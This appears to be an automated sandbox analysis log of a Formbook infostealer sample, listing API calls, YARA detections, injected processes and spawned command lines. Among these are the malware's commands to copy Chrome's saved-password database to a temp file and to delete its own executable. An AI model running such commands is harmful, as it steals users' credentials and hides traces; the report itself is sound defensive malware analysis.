Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB997A NtClose
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_00419850 NtCreateFile
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_00419900 NtReadFile
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_00419980 NtClose
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_00419A30 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_004198FA NtReadFile
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_0041997A NtClose
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 18_2_00419A2C NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 0_2_0126E448
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_0126E4580_2_0126E458
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_0126B7FC0_2_0126B7FC
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_05374D3C0_2_05374D3C
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C88F2_2_0041C88F
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041CA572_2_0041CA57
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041DA162_2_0041DA16
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041B5F62_2_0041B5F6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00409F802_2_00409F80
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F547E6_2_047F547E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04892C9A6_2_04892C9A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891C9F6_2_04891C9F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048834906_2_04883490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488DCC56_2_0488DCC5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048844EF6_2_048844EF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E14106_2_047E1410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047D740C6_2_047D740C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0487F42B6_2_0487F42B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488E5816_2_0488E581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0486E58A6_2_0486E58A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047C0D406_2_047C0D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E15306_2_047E1530
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488D5D26_2_0488D5D2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0487FDDB6_2_0487FDDB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04871DE36_2_04871DE3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048925196_2_04892519
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04881D1B6_2_04881D1B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0486C53F6_2_0486C53F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F5E706_2_047F5E70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04883E966_2_04883E96
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4E616_2_047F4E61
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E76406_2_047E7640
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F66116_2_047F6611
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048926F86_2_048926F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488CE666_2_0488CE66
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048827826_2_04882782
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891FCE6_2_04891FCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047C67D06_2_047C67D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048917466_2_04891746
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E57906_2_047E5790
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F10706_2_047F1070
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048718B66_2_048718B6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F00216_2_047F0021
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047FE0206_2_047FE020
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048928E86_2_048928E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F98106_2_047F9810
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488D0166_2_0488D016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F48CB6_2_047F48CB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047DA0806_2_047DA080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F594B6_2_047F594B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0489D9BE6_2_0489D9BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048861DF6_2_048861DF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048919E26_2_048919E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F71106_2_047F7110
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048199066_2_04819906
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F61806_2_047F6180
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891A996_2_04891A99
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4A5B6_2_047F4A5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F523D6_2_047F523D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048922DD6_2_048922DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04880A026_2_04880A02
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0489E2146_2_0489E214
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E42B06_2_047E42B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047EFB406_2_047EFB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047CEBE06_2_047CEBE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F63C26_2_047F63C2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4B966_2_047F4B96
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBCA576_2_02DBCA57
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBDA166_2_02DBDA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC88F6_2_02DBC88F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA9F806_2_02DA9F80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2FB06_2_02DA2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBB5F66_2_02DBB5F6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2D906_2_02DA2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2D876_2_02DA2D87
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0040103018_2_00401030
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C88F18_2_0041C88F
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041CA5718_2_0041CA57
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041DA1618_2_0041DA16
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041B5F618_2_0041B5F6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402D8718_2_00402D87
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402D9018_2_00402D90
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00409F8018_2_00409F80
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402FB018_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 047CB0E0 appears 176 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04855110 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0481DDE8 appears 48 times
          Source: ewuTygg1Bw.exeBinary or memory string: OriginalFilename vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000000.00000002.435274677.0000000002D50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000000.00000000.412675691.0000000000A94000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.479376784.0000000001C2F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.476548664.0000000000F74000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe Binary or memory string: OriginalFilenameServiceHost.dll8 vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe Binary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: C:\Windows\SysWOW64\cscript.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: ewuTygg1Bw.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vgaot707b.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/10@3/1
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ewuTygg1Bw.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Iobk
          Source: ewuTygg1Bw.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cscript.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: ewuTygg1Bw.exe Virustotal: Detection: 36%
          Source: unknown Process created: C:\Users\user\Desktop\ewuTygg1Bw.exe 'C:\Users\user\Desktop\ewuTygg1Bw.exe'
          Source: unknown Process created: C:\Users\user\Desktop\ewuTygg1Bw.exe {path}
          Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknown Process created: C:\Program Files (x86)\Iobk\vgaot707b.exe C:\Program Files (x86)\Iobk\vgaot707b.exe
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Program Files (x86)\Iobk\vgaot707b.exe {path}
          Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: unknown Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Process created: C:\Users\user\Desktop\ewuTygg1Bw.exe {path}
          Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Iobk\vgaot707b.exe C:\Program Files (x86)\Iobk\vgaot707b.exe
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe'
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Process created: C:\Program Files (x86)\Iobk\vgaot707b.exe {path}
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32
          Source: C:\Windows\SysWOW64\cscript.exe File written: C:\Users\user\AppData\Roaming\983-T328\983logri.ini
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: ewuTygg1Bw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ewuTygg1Bw.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: ewuTygg1Bw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cscript.pdbUGP source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.862871028.0000000005FE0000.00000002.00000001.sdmp
          Source: Binary string: ServiceHost.pdb source: vgaot707b.exe, ewuTygg1Bw.exe
          Source: Binary string: wntdll.pdbUGP source: ewuTygg1Bw.exe, 00000002.00000002.478030527.0000000001980000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.841185505.00000000048BF000.00000040.00000001.sdmp, vgaot707b.exe, 00000012.00000002.836063194.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ewuTygg1Bw.exe, 00000002.00000002.478030527.0000000001980000.00000040.00000001.sdmp, cscript.exe, vgaot707b.exe, 00000012.00000002.836063194.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: vgaot707b.exe, 00000012.00000002.841745449.0000000002E10000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: vgaot707b.exe, 00000012.00000002.841745449.0000000002E10000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: ServiceHost.pdbh/~/ p/_CorDllMainmscoree.dll source: ewuTygg1Bw.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.862871028.0000000005FE0000.00000002.00000001.sdmp

          Data Obfuscation:

          Binary contains a suspicious time stamp
          Source: initial sample Static PE information: 0xB94769C7 [Mon Jul 2 14:31:35 2068 UTC]
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_0041786D push eax; iretd 2_2_00417872
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_00417AB5 push ebp; iretd 2_2_00417AB6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_004166C2 push esp; retf 2_2_004166D6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_0041C6C5 push eax; ret 2_2_0041C718
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_00407773 push cs; ret 2_2_0040777A
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_0041C77C push eax; ret 2_2_0041C782
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_0041C712 push eax; ret 2_2_0041C718
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Code function: 2_2_0041C71B push eax; ret 2_2_0041C782
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0481DE2D push ecx; ret 6_2_0481DE40
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DB7AB5 push ebp; iretd 6_2_02DB7AB6
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DB786D push eax; iretd 6_2_02DB7872
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DBC6C5 push eax; ret 6_2_02DBC718
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DBD632 push 813536D0h; iretd 6_2_02DBD637
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DBC77C push eax; ret 6_2_02DBC782
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DA7773 push cs; ret 6_2_02DA777A
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DBC71B push eax; ret 6_2_02DBC782
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_02DBC712 push eax; ret 6_2_02DBC718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_0041786D push eax; iretd 18_2_00417872
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_00417AB5 push ebp; iretd 18_2_00417AB6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_004166C2 push esp; retf 18_2_004166D6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_0041C6C5 push eax; ret 18_2_0041C718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_00407773 push cs; ret 18_2_0040777A
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_0041C77C push eax; ret 18_2_0041C782
